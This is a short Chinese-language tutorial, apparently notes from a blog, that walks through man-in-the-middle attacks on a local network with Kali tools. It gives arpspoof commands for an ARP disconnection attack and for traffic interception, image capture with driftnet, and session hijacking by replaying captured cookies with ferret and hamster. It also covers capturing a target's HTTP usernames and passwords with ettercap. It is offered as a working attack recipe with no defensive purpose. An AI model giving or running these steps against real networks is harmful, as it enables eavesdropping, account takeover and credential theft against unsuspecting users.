arpspoof 是一款進行arp欺騙的工具
arpspoof -i 網卡 -t 目標ip 默認網關
如果kali沒有進行IP轉發 那么目標就會因為配置錯網而導致斷網 這就是所謂的arp斷網攻擊
開啟IP轉發:echo 1 >/proc/sys/net/ipv4/ip_forward
關閉IP轉發:echo 0 >/proc/sys/net/ipv4/ip_forward
查看IP轉發是否成功:cat /proc/sys/net/ipv4/ip_forward 如果顯示1則表示開啟成功,顯示0則開啟失敗
開啟IP轉發后 流量會經過kali的主機而后再去到目標 所以這時開啟arpspoof 那么目標就不會斷網
因為流量通過了kali主機那么我們就可以做點手腳了
比如:
獲取目標主機正在訪問的圖片-->工具 arpspoof 和 driftnet
driftnet用法: driftnet -i 網卡
在開啟路由轉發后 開啟arpspoof 因為流量通過了kali主機 我們就可以用driftnet獲取在流量中的圖片
會話劫持-->工具 arpspoof 和 wireshark , ferret, hamster
wireshark 抓包工具
ferret 將.pcap文件轉換問.txt給hamster使用
hamster 重新釋放流量
1.開啟ip轉發和arpspoof
2.用wireshark抓包並報存到/root/目錄(文件格式為.pcap)->在命令行直接輸入wireshark即可打開工具
3.用 cd 切換到/root/目錄 用ferret將wireshark保存的.pcap格式文件轉換為txt文件
ferret用法: ferret -r .pcap格式文件
4.用hamster重放流量
hamster用法: hamster -h
5.在瀏覽器中設置代理127.0.0.1:1234 然后訪問127.0.0.1:1234
如果在瀏覽器下方出現目標ip則成功 反之失敗
點擊那個標簽 瀏覽器左邊就會出現很多url 這些就是目標訪問的網站 點擊這些url 就可以了
~~~~~
獲取目標http賬號密碼
1.開啟ip轉發和arpspoof
2.開啟ettercap
Ettercap -Tq -i 網卡
如果目標登錄了某網站 那么我們可以獲取他的賬號密碼了